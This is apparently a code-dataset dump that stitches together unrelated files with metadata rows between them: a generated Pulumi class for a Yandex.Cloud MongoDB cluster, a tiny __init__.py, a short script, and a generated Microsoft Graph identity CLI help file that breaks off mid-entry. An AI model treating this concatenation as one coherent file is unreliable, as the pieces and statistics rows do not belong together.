:param pulumi.Input[str] name: The fully qualified domain name of the host. Computed on server side.
:param pulumi.Input[str] network_id: ID of the network, to which the MongoDB cluster belongs.
:param pulumi.Input[pulumi.InputType['MdbMongodbClusterResourcesArgs']] resources: Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A set of ids of security groups assigned to hosts of the cluster.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterUserArgs']]]] users: A user of the MongoDB cluster. The structure is documented below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MdbMongodbClusterArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a MongoDB cluster within the Yandex.Cloud. For more information, see
[the official documentation](https://cloud.yandex.com/docs/managed-mongodb/concepts).
## Example Usage
Example of creating a Single Node MongoDB.
```python
import pulumi
import pulumi_yandex as yandex
foo_vpc_network = yandex.VpcNetwork("fooVpcNetwork")
foo_vpc_subnet = yandex.VpcSubnet("fooVpcSubnet",
network_id=foo_vpc_network.id,
v4_cidr_blocks=["10.1.0.0/24"],
zone="ru-central1-a")
foo_mdb_mongodb_cluster = yandex.MdbMongodbCluster("fooMdbMongodbCluster",
cluster_config=yandex.MdbMongodbClusterClusterConfigArgs(
version="4.2",
),
databases=[yandex.MdbMongodbClusterDatabaseArgs(
name="testdb",
)],
environment="PRESTABLE",
hosts=[yandex.MdbMongodbClusterHostArgs(
subnet_id=foo_vpc_subnet.id,
zone_id="ru-central1-a",
)],
labels={
"test_key": "test_value",
},
maintenance_window=yandex.MdbMongodbClusterMaintenanceWindowArgs(
type="ANYTIME",
),
network_id=foo_vpc_network.id,
resources=yandex.MdbMongodbClusterResourcesArgs(
disk_size=16,
disk_type_id="network-hdd",
resource_preset_id="b1.nano",
),
users=[yandex.MdbMongodbClusterUserArgs(
name="john",
password="password",
permissions=[yandex.MdbMongodbClusterUserPermissionArgs(
database_name="testdb",
)],
)])
```
## Import
A cluster can be imported using the `id` of the resource, e.g.
```sh
$ pulumi import yandex:index/mdbMongodbCluster:MdbMongodbCluster foo cluster_id
```
:param str resource_name: The name of the resource.
:param MdbMongodbClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MdbMongodbClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_config: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterClusterConfigArgs']]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterDatabaseArgs']]]]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
environment: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
hosts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterHostArgs']]]]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
maintenance_window: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterMaintenanceWindowArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
resources: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterResourcesArgs']]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterUserArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MdbMongodbClusterArgs.__new__(MdbMongodbClusterArgs)
if cluster_config is None and not opts.urn:
raise TypeError("Missing required property 'cluster_config'")
__props__.__dict__["cluster_config"] = cluster_config
__props__.__dict__["cluster_id"] = cluster_id
if databases is None and not opts.urn:
raise TypeError("Missing required property 'databases'")
__props__.__dict__["databases"] = databases
__props__.__dict__["deletion_protection"] = deletion_protection
__props__.__dict__["description"] = description
if environment is None and not opts.urn:
raise TypeError("Missing required property 'environment'")
__props__.__dict__["environment"] = environment
__props__.__dict__["folder_id"] = folder_id
if hosts is None and not opts.urn:
raise TypeError("Missing required property 'hosts'")
__props__.__dict__["hosts"] = hosts
__props__.__dict__["labels"] = labels
__props__.__dict__["maintenance_window"] = maintenance_window
__props__.__dict__["name"] = name
if network_id is None and not opts.urn:
raise TypeError("Missing required property 'network_id'")
__props__.__dict__["network_id"] = network_id
if resources is None and not opts.urn:
raise TypeError("Missing required property 'resources'")
__props__.__dict__["resources"] = resources
__props__.__dict__["security_group_ids"] = security_group_ids
if users is None and not opts.urn:
raise TypeError("Missing required property 'users'")
__props__.__dict__["users"] = users
__props__.__dict__["created_at"] = None
__props__.__dict__["health"] = None
__props__.__dict__["sharded"] = None
__props__.__dict__["status"] = None
super(MdbMongodbCluster, __self__).__init__(
'yandex:index/mdbMongodbCluster:MdbMongodbCluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_config: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterClusterConfigArgs']]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
created_at: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterDatabaseArgs']]]]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
environment: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
health: Optional[pulumi.Input[str]] = None,
hosts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterHostArgs']]]]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
maintenance_window: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterMaintenanceWindowArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
resources: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterResourcesArgs']]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
sharded: Optional[pulumi.Input[bool]] = None,
status: Optional[pulumi.Input[str]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterUserArgs']]]]] = None) -> 'MdbMongodbCluster':
"""
Get an existing MdbMongodbCluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['MdbMongodbClusterClusterConfigArgs']] cluster_config: Configuration of the MongoDB subcluster. The structure is documented below.
:param pulumi.Input[str] cluster_id: The ID of the cluster.
:param pulumi.Input[str] created_at: Creation timestamp of the key.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterDatabaseArgs']]]] databases: A database of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[bool] deletion_protection: Inhibits deletion of the cluster. Can be either `true` or `false`.
- - -
:param pulumi.Input[str] description: Description of the MongoDB cluster.
:param pulumi.Input[str] environment: Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
:param pulumi.Input[str] folder_id: The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
:param pulumi.Input[str] health: The health of the host.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterHostArgs']]]] hosts: A host of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the MongoDB cluster.
:param pulumi.Input[str] name: The fully qualified domain name of the host. Computed on server side.
:param pulumi.Input[str] network_id: ID of the network, to which the MongoDB cluster belongs.
:param pulumi.Input[pulumi.InputType['MdbMongodbClusterResourcesArgs']] resources: Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A set of ids of security groups assigned to hosts of the cluster.
:param pulumi.Input[bool] sharded: MongoDB Cluster mode enabled/disabled.
:param pulumi.Input[str] status: Status of the cluster. Can be either `CREATING`, `STARTING`, `RUNNING`, `UPDATING`, `STOPPING`, `STOPPED`, `ERROR` or `STATUS_UNKNOWN`.
For more information see `status` field of JSON representation in [the official documentation](https://cloud.yandex.com/docs/managed-mongodb/api-ref/Cluster/).
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterUserArgs']]]] users: A user of the MongoDB cluster. The structure is documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MdbMongodbClusterState.__new__(_MdbMongodbClusterState)
__props__.__dict__["cluster_config"] = cluster_config
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["created_at"] = created_at
__props__.__dict__["databases"] = databases
__props__.__dict__["deletion_protection"] = deletion_protection
__props__.__dict__["description"] = description
__props__.__dict__["environment"] = environment
__props__.__dict__["folder_id"] = folder_id
__props__.__dict__["health"] = health
__props__.__dict__["hosts"] = hosts
__props__.__dict__["labels"] = labels
__props__.__dict__["maintenance_window"] = maintenance_window
__props__.__dict__["name"] = name
__props__.__dict__["network_id"] = network_id
__props__.__dict__["resources"] = resources
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["sharded"] = sharded
__props__.__dict__["status"] = status
__props__.__dict__["users"] = users
return MdbMongodbCluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clusterConfig")
def cluster_config(self) -> pulumi.Output['outputs.MdbMongodbClusterClusterConfig']:
"""
Configuration of the MongoDB subcluster. The structure is documented below.
"""
return pulumi.get(self, "cluster_config")
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> pulumi.Output[str]:
"""
The ID of the cluster.
"""
return pulumi.get(self, "cluster_id")
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> pulumi.Output[str]:
"""
Creation timestamp of the key.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Sequence['outputs.MdbMongodbClusterDatabase']]:
"""
A database of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "databases")
@property
@pulumi.getter(name="deletionProtection")
def deletion_protection(self) -> pulumi.Output[bool]:
"""
Inhibits deletion of the cluster. Can be either `true` or `false`.
- - -
"""
return pulumi.get(self, "deletion_protection")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
Description of the MongoDB cluster.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def environment(self) -> pulumi.Output[str]:
"""
Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
"""
return pulumi.get(self, "environment")
@property
@pulumi.getter(name="folderId")
def folder_id(self) -> pulumi.Output[str]:
"""
The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
"""
return pulumi.get(self, "folder_id")
@property
@pulumi.getter
def health(self) -> pulumi.Output[str]:
"""
The health of the host.
"""
return pulumi.get(self, "health")
@property
@pulumi.getter
def hosts(self) -> pulumi.Output[Sequence['outputs.MdbMongodbClusterHost']]:
"""
A host of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "hosts")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Mapping[str, str]]:
"""
A set of key/value label pairs to assign to the MongoDB cluster.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="maintenanceWindow")
def maintenance_window(self) -> pulumi.Output['outputs.MdbMongodbClusterMaintenanceWindow']:
return pulumi.get(self, "maintenance_window")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The fully qualified domain name of the host. Computed on server side.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkId")
def network_id(self) -> pulumi.Output[str]:
"""
ID of the network, to which the MongoDB cluster belongs.
"""
return pulumi.get(self, "network_id")
@property
@pulumi.getter
def resources(self) -> pulumi.Output['outputs.MdbMongodbClusterResources']:
"""
Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "resources")
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A set of ids of security groups assigned to hosts of the cluster.
"""
return pulumi.get(self, "security_group_ids")
@property
@pulumi.getter
def sharded(self) -> pulumi.Output[bool]:
"""
MongoDB Cluster mode enabled/disabled.
"""
return pulumi.get(self, "sharded")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Status of the cluster. Can be either `CREATING`, `STARTING`, `RUNNING`, `UPDATING`, `STOPPING`, `STOPPED`, `ERROR` or `STATUS_UNKNOWN`.
For more information see `status` field of JSON representation in [the official documentation](https://cloud.yandex.com/docs/managed-mongodb/api-ref/Cluster/).
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def users(self) -> pulumi.Output[Sequence['outputs.MdbMongodbClusterUser']]:
"""
A user of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "users")
| 46.413628 | 183 | 0.652027 | 5,293 | 48,363 | 5.78481 | 0.053845 | 0.102028 | 0.080669 | 0.04311 | 0.910872 | 0.889448 | 0.864594 | 0.839773 | 0.837323 | 0.818773 | 0 | 0.000843 | 0.239708 | 48,363 | 1,041 | 184 | 46.458213 | 0.831874 | 0.333912 | 0 | 0.727592 | 1 | 0 | 0.143876 | 0.06462 | 0 | 0 | 0 | 0 | 0 | 1 | 0.165202 | false | 0.001757 | 0.012302 | 0.005272 | 0.27768 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
64e7c68416d212fe22a6f40a79b1a13b9e4b67aa | 46 | py | Python | blueprint/__init__.py | sspicher/helloworld | 797c430149696d6754c6c846a4fcdd0a5ad58766 | [
"Unlicense"
] | null | null | null | blueprint/__init__.py | sspicher/helloworld | 797c430149696d6754c6c846a4fcdd0a5ad58766 | [
"Unlicense"
] | null | null | null | blueprint/__init__.py | sspicher/helloworld | 797c430149696d6754c6c846a4fcdd0a5ad58766 | [
"Unlicense"
] | null | null | null | # __init__.py
from .blueprint import Blueprint | 23 | 32 | 0.826087 | 6 | 46 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 46 | 2 | 32 | 23 | 0.829268 | 0.23913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
8f155ce48d49c293519b2ab123155a87008f3367 | 131 | py | Python | threed_strudel/bin/strudel_chopModelMapMPI.py | emdb-empiar/3dstrudel | 88ec3a2c54bdce87298bba0a32c8ce753fd5fd08 | [
"Apache-2.0"
] | null | null | null | threed_strudel/bin/strudel_chopModelMapMPI.py | emdb-empiar/3dstrudel | 88ec3a2c54bdce87298bba0a32c8ce753fd5fd08 | [
"Apache-2.0"
] | 1 | 2021-06-03T13:53:02.000Z | 2021-12-15T14:18:12.000Z | threed_strudel/bin/strudel_chopModelMapMPI.py | emdb-empiar/3dstrudel | 88ec3a2c54bdce87298bba0a32c8ce753fd5fd08 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from threed_strudel.chop import chop_model_map_mpi
if __name__ == '__main__':
chop_model_map_mpi.main() | 21.833333 | 50 | 0.770992 | 21 | 131 | 4.095238 | 0.714286 | 0.209302 | 0.27907 | 0.348837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122137 | 131 | 6 | 51 | 21.833333 | 0.747826 | 0.152672 | 0 | 0 | 0 | 0 | 0.072072 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
8f271c57cfad451578e88e35f77d5d9aeecea24d | 52,560 | py | Python | msgraph/cli/command_modules/identitysignins/azext_identitysignins/generated/_help.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | null | null | null | msgraph/cli/command_modules/identitysignins/azext_identitysignins/generated/_help.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | 22 | 2022-03-29T22:54:37.000Z | 2022-03-29T22:55:27.000Z | msgraph/cli/command_modules/identitysignins/azext_identitysignins/generated/_help.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.help_files import helps
helps['identitysignins'] = '''
type: group
short-summary: Manage Identity Sign Ins
'''
helps['identitysignins datapolicyoperationsdatapolicyoperation'] = """
type: group
short-summary: Manage datapolicyoperationsdatapolicyoperation with identitysignins
"""
helps['identitysignins datapolicyoperationsdatapolicyoperation create-data-policy-operation'] = """
type: command
short-summary: "Add new entity to dataPolicyOperations."
"""
helps['identitysignins datapolicyoperationsdatapolicyoperation delete-data-policy-operation'] = """
type: command
short-summary: "Delete entity from dataPolicyOperations."
"""
helps['identitysignins datapolicyoperationsdatapolicyoperation list-data-policy-operation'] = """
type: command
short-summary: "Get entities from dataPolicyOperations."
"""
helps['identitysignins datapolicyoperationsdatapolicyoperation show-data-policy-operation'] = """
type: command
short-summary: "Get entity from dataPolicyOperations by key."
"""
helps['identitysignins datapolicyoperationsdatapolicyoperation update-data-policy-operation'] = """
type: command
short-summary: "Update entity in dataPolicyOperations."
"""
helps['identitysignins identity'] = """
type: group
short-summary: Manage identity with identitysignins
"""
helps['identitysignins identity delete-conditional-access'] = """
type: command
short-summary: "Delete navigation property conditionalAccess for identity."
"""
helps['identitysignins identity show-conditional-access'] = """
type: command
short-summary: "Get conditionalAccess from identity."
"""
helps['identitysignins identity update-conditional-access'] = """
type: command
short-summary: "Update the navigation property conditionalAccess in identity."
parameters:
- name: --named-locations
long-summary: |
Usage: --named-locations created-date-time=XX display-name=XX modified-date-time=XX id=XX
created-date-time: The Timestamp type represents creation date and time of the location using ISO 8601 \
format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: \
'2014-01-01T00:00:00Z'. Read-only.
display-name: Human-readable name of the location.
modified-date-time: The Timestamp type represents last modified date and time of the location using ISO \
8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: \
'2014-01-01T00:00:00Z'. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --named-locations argument.
"""
helps['identitysignins identityconditionalaccess'] = """
type: group
short-summary: Manage identityconditionalaccess with identitysignins
"""
helps['identitysignins identityconditionalaccess create-named-location'] = """
type: command
short-summary: "Create new navigation property to namedLocations for identity."
"""
helps['identitysignins identityconditionalaccess create-policy'] = """
type: command
short-summary: "Create new navigation property to policies for identity."
parameters:
- name: --grant-controls
short-summary: "conditionalAccessGrantControls"
long-summary: |
Usage: --grant-controls built-in-controls=XX custom-authentication-factors=XX operator=XX terms-of-use=XX
built-in-controls: List of values of built-in controls required by the policy. Possible values: Block, \
Mfa, CompliantDevice, DomainJoinedDevice, ApprovedApplication, CompliantApplication
custom-authentication-factors: List of custom controls IDs required by the policy. For more information, \
see Custom controls.
operator: Defines the relationship of the grant controls. Possible values: AND, OR.
terms-of-use: List of terms of use IDs required by the policy.
- name: --application-enforced-restrictions
short-summary: "applicationEnforcedRestrictionsSessionControl"
long-summary: |
Usage: --application-enforced-restrictions is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --cloud-app-security
short-summary: "cloudAppSecuritySessionControl"
long-summary: |
Usage: --cloud-app-security cloud-app-security-type=XX is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --persistent-browser
short-summary: "persistentBrowserSessionControl"
long-summary: |
Usage: --persistent-browser mode=XX is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --sign-in-frequency
short-summary: "signInFrequencySessionControl"
long-summary: |
Usage: --sign-in-frequency type=XX value=XX is-enabled=XX
value: The number of days or hours.
is-enabled: Specifies whether the session control is enabled.
- name: --applications
short-summary: "conditionalAccessApplications"
long-summary: |
Usage: --applications exclude-applications=XX include-applications=XX include-user-actions=XX
exclude-applications: The list of application IDs explicitly excluded from the policy.
include-applications: The list of application IDs the policy applies to, unless explicitly excluded (in \
excludeApplications). Can also be set to All.
include-user-actions: User actions to include. For example, urn:user:registersecurityinfo
- name: --locations
short-summary: "conditionalAccessLocations"
long-summary: |
Usage: --locations exclude-locations=XX include-locations=XX
exclude-locations: Location IDs excluded from scope of policy.
include-locations: Location IDs in scope of policy unless explicitly excluded, All, or AllTrusted.
- name: --platforms
short-summary: "conditionalAccessPlatforms"
long-summary: |
Usage: --platforms exclude-platforms=XX include-platforms=XX
exclude-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, unknownFutureValue.
include-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, all, \
unknownFutureValue.
- name: --users
short-summary: "conditionalAccessUsers"
long-summary: |
Usage: --users exclude-groups=XX exclude-roles=XX exclude-users=XX include-groups=XX include-roles=XX \
include-users=XX
exclude-groups: Group IDs excluded from scope of policy.
exclude-roles: Role IDs excluded from scope of policy.
exclude-users: User IDs excluded from scope of policy and/or GuestsOrExternalUsers.
include-groups: Group IDs in scope of policy unless explicitly excluded, or All.
include-roles: Role IDs in scope of policy unless explicitly excluded, or All.
include-users: User IDs in scope of policy unless explicitly excluded, or None or All or \
GuestsOrExternalUsers.
"""
helps['identitysignins identityconditionalaccess delete-named-location'] = """
type: command
short-summary: "Delete navigation property namedLocations for identity."
"""
helps['identitysignins identityconditionalaccess delete-policy'] = """
type: command
short-summary: "Delete navigation property policies for identity."
"""
helps['identitysignins identityconditionalaccess list-named-location'] = """
type: command
short-summary: "Get namedLocations from identity."
"""
helps['identitysignins identityconditionalaccess list-policy'] = """
type: command
short-summary: "Get policies from identity."
"""
helps['identitysignins identityconditionalaccess show-named-location'] = """
type: command
short-summary: "Get namedLocations from identity."
"""
helps['identitysignins identityconditionalaccess show-policy'] = """
type: command
short-summary: "Get policies from identity."
"""
helps['identitysignins identityconditionalaccess update-named-location'] = """
type: command
short-summary: "Update the navigation property namedLocations in identity."
"""
helps['identitysignins identityconditionalaccess update-policy'] = """
type: command
short-summary: "Update the navigation property policies in identity."
parameters:
- name: --grant-controls
short-summary: "conditionalAccessGrantControls"
long-summary: |
Usage: --grant-controls built-in-controls=XX custom-authentication-factors=XX operator=XX terms-of-use=XX
built-in-controls: List of values of built-in controls required by the policy. Possible values: Block, \
Mfa, CompliantDevice, DomainJoinedDevice, ApprovedApplication, CompliantApplication
custom-authentication-factors: List of custom controls IDs required by the policy. For more information, \
see Custom controls.
operator: Defines the relationship of the grant controls. Possible values: AND, OR.
terms-of-use: List of terms of use IDs required by the policy.
- name: --application-enforced-restrictions
short-summary: "applicationEnforcedRestrictionsSessionControl"
long-summary: |
Usage: --application-enforced-restrictions is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --cloud-app-security
short-summary: "cloudAppSecuritySessionControl"
long-summary: |
Usage: --cloud-app-security cloud-app-security-type=XX is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --persistent-browser
short-summary: "persistentBrowserSessionControl"
long-summary: |
Usage: --persistent-browser mode=XX is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --sign-in-frequency
short-summary: "signInFrequencySessionControl"
long-summary: |
Usage: --sign-in-frequency type=XX value=XX is-enabled=XX
value: The number of days or hours.
is-enabled: Specifies whether the session control is enabled.
- name: --applications
short-summary: "conditionalAccessApplications"
long-summary: |
Usage: --applications exclude-applications=XX include-applications=XX include-user-actions=XX
exclude-applications: The list of application IDs explicitly excluded from the policy.
include-applications: The list of application IDs the policy applies to, unless explicitly excluded (in \
excludeApplications). Can also be set to All.
include-user-actions: User actions to include. For example, urn:user:registersecurityinfo
- name: --locations
short-summary: "conditionalAccessLocations"
long-summary: |
Usage: --locations exclude-locations=XX include-locations=XX
exclude-locations: Location IDs excluded from scope of policy.
include-locations: Location IDs in scope of policy unless explicitly excluded, All, or AllTrusted.
- name: --platforms
short-summary: "conditionalAccessPlatforms"
long-summary: |
Usage: --platforms exclude-platforms=XX include-platforms=XX
exclude-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, unknownFutureValue.
include-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, all, \
unknownFutureValue.
- name: --users
short-summary: "conditionalAccessUsers"
long-summary: |
Usage: --users exclude-groups=XX exclude-roles=XX exclude-users=XX include-groups=XX include-roles=XX \
include-users=XX
exclude-groups: Group IDs excluded from scope of policy.
exclude-roles: Role IDs excluded from scope of policy.
exclude-users: User IDs excluded from scope of policy and/or GuestsOrExternalUsers.
include-groups: Group IDs in scope of policy unless explicitly excluded, or All.
include-roles: Role IDs in scope of policy unless explicitly excluded, or All.
include-users: User IDs in scope of policy unless explicitly excluded, or None or All or \
GuestsOrExternalUsers.
"""
helps['identitysignins identityprovidersidentityprovider'] = """
type: group
short-summary: Manage identityprovidersidentityprovider with identitysignins
"""
helps['identitysignins identityprovidersidentityprovider create-identity-provider'] = """
type: command
short-summary: "Add new entity to identityProviders."
"""
helps['identitysignins identityprovidersidentityprovider delete-identity-provider'] = """
type: command
short-summary: "Delete entity from identityProviders."
"""
helps['identitysignins identityprovidersidentityprovider list-identity-provider'] = """
type: command
short-summary: "Get entities from identityProviders."
"""
helps['identitysignins identityprovidersidentityprovider show-identity-provider'] = """
type: command
short-summary: "Get entity from identityProviders by key."
"""
helps['identitysignins identityprovidersidentityprovider update-identity-provider'] = """
type: command
short-summary: "Update entity in identityProviders."
"""
helps['identitysignins informationprotection'] = """
type: group
short-summary: Manage informationprotection with identitysignins
"""
helps['identitysignins informationprotection show-information-protection'] = """
type: command
short-summary: "Get informationProtection."
"""
helps['identitysignins informationprotection update-information-protection'] = """
type: command
short-summary: "Update informationProtection."
"""
helps['identitysignins informationprotection'] = """
type: group
short-summary: Manage informationprotection with identitysignins
"""
helps['identitysignins informationprotection create-threat-assessment-request'] = """
type: command
short-summary: "Create new navigation property to threatAssessmentRequests for informationProtection."
parameters:
- name: --results
short-summary: "A collection of threat assessment results. Read-only. By default, a GET \
/threatAssessmentRequests/{id} does not return this property unless you apply $expand on it."
long-summary: |
Usage: --results created-date-time=XX message=XX result-type=XX id=XX
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'.
message: The result message for each threat assessment.
id: Read-only.
Multiple actions can be specified by using more than one --results argument.
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['identitysignins informationprotection delete-threat-assessment-request'] = """
type: command
short-summary: "Delete navigation property threatAssessmentRequests for informationProtection."
"""
helps['identitysignins informationprotection list-threat-assessment-request'] = """
type: command
short-summary: "Get threatAssessmentRequests from informationProtection."
"""
helps['identitysignins informationprotection show-threat-assessment-request'] = """
type: command
short-summary: "Get threatAssessmentRequests from informationProtection."
"""
helps['identitysignins informationprotection update-threat-assessment-request'] = """
type: command
